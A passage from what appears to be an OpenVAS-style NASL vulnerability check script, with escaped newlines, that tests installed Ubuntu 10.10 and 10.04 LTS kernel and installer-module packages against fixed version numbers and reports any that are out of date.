exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-312-ec2\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-312-ec2\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-386\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-generic-pae\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-generic\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-386\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-generic-pae\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-generic\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-virtual\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-28\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-312\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 